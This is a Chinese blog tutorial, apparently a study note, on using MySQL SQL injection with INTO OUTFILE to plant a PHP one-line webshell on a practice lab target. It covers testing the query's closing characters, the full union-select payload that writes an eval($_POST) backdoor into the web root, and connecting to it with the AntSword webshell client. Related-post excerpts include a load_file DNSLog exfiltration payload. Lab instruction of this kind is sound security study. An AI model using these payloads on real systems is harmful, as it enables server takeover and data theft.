SQL注入——文件上传

已于 2023-03-11 15:28:40 修改
阅读量2.3k 收藏 9
点赞数 2
分类专栏: owasp十大漏洞学习 文章标签: 网络安全 php 安全
于 2023-03-11 15:22:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heyingcheng/article/details/129461703
版权

目录

一,mysql文件上传要点

二,文件上传指令

一句话木马

三,实例

1,判断注入方式 

2,测试目标网站的闭合方式:

3,写入一句话木马

4,拿到控制权 

一,mysql文件上传要点

1,show variables like '%secure%';用来查看mysql是否有读写文件的权限

2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限

3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径

二,文件上传指令

其实我们最终的目的是往目标靶场上上传一句话木马,或者是自己想上传的php文件。

文件上传的用法:

(1)直接可以写在网站的目录下面,然后可以当做一句话木马直接去连接

(2)发现目标网站有文件包含,同时数据库又具备写入一句话木马的权限进行利用

一句话木马

?id=-1')) union select 1,2,"<?php @eval($_POST['hyc']); ?>" into outfile "D:\\phpstudy_pro\\WWW\\hyc.php" --+

<?php @eval($_POST['password']);?>:一句话木马

password是预留密码,这里给的密码是hyc

D:\\phpstudy_pro\\WWW\\是文件路径

hyc.php是新插入的文件名

三,实例

1,判断注入方式 

 当我们向里面传值的时候,会提示...outfile,说明可用文件上传注入

2,测试目标网站的闭合方式:

但是报错内容没有显示是哪里报错

于是我们使用--+看一下到底是不是’为闭合方式,如下图报错不变,所以闭合方式不是’

于是我们将进行更详细的测试:

当我们试到'))时,可以正常显示

当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。

是因为正确答案'))的闭合方式使”无效

怎么解决呢?

我们可以用and 1=1和and 1=2来测试

双引号测试:

 两种结果一样,说明”不是正确的结果。

单引号和双括号测试:

 

两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。

测试列数

3,写入一句话木马

 在目标路径下可以看到写入的木马:

打开查看里面写入的内容:

4,拿到控制权 

 用蚁剑连一下目标靶场:

拿到了电脑的使用权,注入目标达成: 

在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限

 接下来可以上传大马,反弹拿web shell

是小何不是小盒呀
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入攻击——信息安全
08-20
SQL注入攻击是网络安全领域中的一种常见威胁,针对基于SQL(结构化查询语言)的数据库管理系统。这种攻击方式利用了Web应用程序在处理用户输入时的安全漏洞,使得攻击者能够注入恶意的SQL代码,进而控制或篡改数据库...
原创:APT之网站SQL注入导致的文件任意上传
08-24
原创:APT之网站SQL注入导致的文件任意上传
Web安全 SQL注入 || 文件上传 的漏洞.(拿到服务器的最高权限.)
网络安全领域___专研者.
02-07 5188
本文章是DVWA靶场来模拟,所有答案均为个人想法.(有更好的答案可以评论.) 内容有:(1)SQL注入方式(sqlmap工具的利用)通过SQL注入漏洞一步步拿到管理员后台的账号和密码.(2)寻找网站后台的登陆页面.(3)一句话木马的编写.(4)通过一句话木马连接服务器,并拿到服务器的权限.(5)文件上传技巧和绕过一些比较简单的限制.(6)随意下载和上传服务器的文件.(7)远程连接控制服务器.
网安笔记--SQL注入、XSS、文件上传、文件包含。
Pqc010101的博客
08-14 364
②在可以进行输入的地方(如:输入框、留言板等)输入一些恶意脚本,观察是否会弹出警告框。权限绕过、密码找回、验证码自动识别、客户端回显、绕过、暴力破解、重复使用、支付逻辑漏洞、未进行登录凭证验证。①信息收集相关的URL、页面结构、可输入的字段、XSS漏洞。1、原理:在WEB页面中写入恶意脚本使用户浏览页面时获取控制用户浏览器操作的攻击方式。②通过文件上传等手段在网站根目录下传入恶意文件。2、过滤alert()、prompt()、confirm()。2、常见绕过方式(Windows、Linux)
记一次“有手就行”的从SQL注入文件上传Getshell的简单过程
最新发布
gaotlantis的博客
06-04 764
要多做尝试不要气馁。。。。文章转自:https://juejin.cn/post/7375928754148016155。
常见漏洞简介,网络安全sql注入、xss、xxe、CSRF、文件上传等)
weixin_50651979的博客
03-26 2087
webshell就是以asp、php、jsp或者cgi等网页形式存在的一种命令执行方式,也可以将其称为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或者php后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)webshell后门隐藏性高,可以轻松穿越防火墙,访问webshell时不会留下系统日志,指挥在网站的web日志中留下一些数据提交记录。
SQL注入与木马上传
zgqtxwd的专栏
04-26 1153
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
SQL注入写webshell
柠檬i的博客
08-06 684
`INTO OUTFILE`是MySQL中用于将查询结果输出到文件的语法。它允许将查询结果写入到服务器文件系统中的指定文件。
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1455
SQL注入上传一句话木马
CISP-PTE考前练习-SQL注入
千寻的博客
10-17 3567
常见的SQL注入的总结
文件上传具体实现
weixin_43934702的博客
06-07 603
文件上传组件封装
SQL网站注入攻击——明小子工具利用案例
06-20
SQL网站注入攻击——明小子工具利用案例 SQL网站注入攻击是一种常见的网络攻击方式,攻击者通过注入恶意SQL代码来获取网站敏感信息或控制网站。明小子工具是SQL网站注入攻击的利器,本文将详细介绍明小子工具的使用...
ssm实现文件上传jar包
06-20
本篇文章将详细探讨如何使用SSM来实现文件上传,并关注提供的两个jar包——`commons-io-2.4.jar`和`commons-fileupload-1.2.2.jar`的作用。 1. **文件上传基本流程** 文件上传通常涉及以下几个步骤: - 前端创建...
ASP.NET源码——文件在线管理系统.zip
10-10
9. **安全性**:系统应考虑防止SQL注入、跨站脚本攻击(XSS)和其他网络安全威胁,ASP.NET提供了多种内置的安全防护机制。 10. **部署与配置**:最后,了解如何配置IIS服务器和发布ASP.NET应用程序到生产环境也是开发...
ASP.NET源码——[上传下载]多文件无刷新上传源码.zip
10-10
8. **安全考虑**:为了防止恶意文件上传,源码可能会有文件类型检查和大小限制,以防止如SQL注入、跨站脚本(XSS)等攻击。 这个源码包是一个很好的学习资源,可以帮助开发者理解如何在ASP.NET环境中实现高效且用户...
网络安全实验十四 文件上传与注入攻击
qq_64314976的博客
06-23 363
函数用于进行正则表达式匹配,成功返回 1 ,否则返回 0。函数将上传的文件移动到新位置,若成功,则返回 true,否则返回 false。根据服务器端代码的提示,上传php文件。通过实验学习到文件上传注入攻击过程以及文件上传漏洞原理等等,刚开始进入时经常出错,访问页面不显示,后来通过和同学交流才得以解决。服务器端代码过滤文件后缀为“.php”的文件类型,如果上传文件包含“.php”,则程序输出不允许上传错误提示并退出。本实验构建浏览器/服务器环境,由两台主机组成,一台作为服务器,另一台作为用户客户端。
WAF绕过-漏洞利用篇-sql注入+文件上传-过狗
xiaoheizi的博客
08-05 456
硬件型WAF以一个独立的硬件设备的形态存在,支持以多种方式(如透明桥接模式、旁路模式、反向代理等)部署到网络中为后端的Web应用提供安全防护,是最为传统的WAF型态,在受访企业中部署占比为35.2%。国内的绿盟、安恒、启明星辰等老牌厂商旗下的WAF都属于此类。随着云计算技术的快速发展,使得基于云的WAF实现成为可能,在本次调查中占比甚至超过了传统的硬件WAF跃升为第一位,达到39.4%。就是来自网站内部的过滤,直接出现在网站代码中,比如说对输入的参数强制类转换啊,对输入的参数进行敏感词检测啊什么的。
SQL注入篇——一句话木马
爱国小白帽
01-08 6366
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
技巧和诀窍: 如何上传一个.SQL文件到远程主机并且执行它来部署一个SQL数据库
我的地盘
01-12 758
原文地址】 Tip/Trick: How to upload a .SQL file to a Hoster and Execute it to Deploy a SQL Database 【原文发表日期】 Thursday, January 11, 2007 12:20 AM 上个月 (英文),我讨论了新的(免费的)数据库发布向导,它是设计来充分简化在web主机环境中上传和部署 SQL Ex
"SQL注入初学——松风:利用技巧检测漏洞和识别数据库种类
SQL注入是一种常见的Web应用程序安全漏洞,可以让攻击者执行恶意的SQL语句,从而获取到数据库中的敏感信息或者修改数据库内容。本文将从初学者的角度介绍SQL注入的一些基本技巧和方法。 首先,我们可以通过在URL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值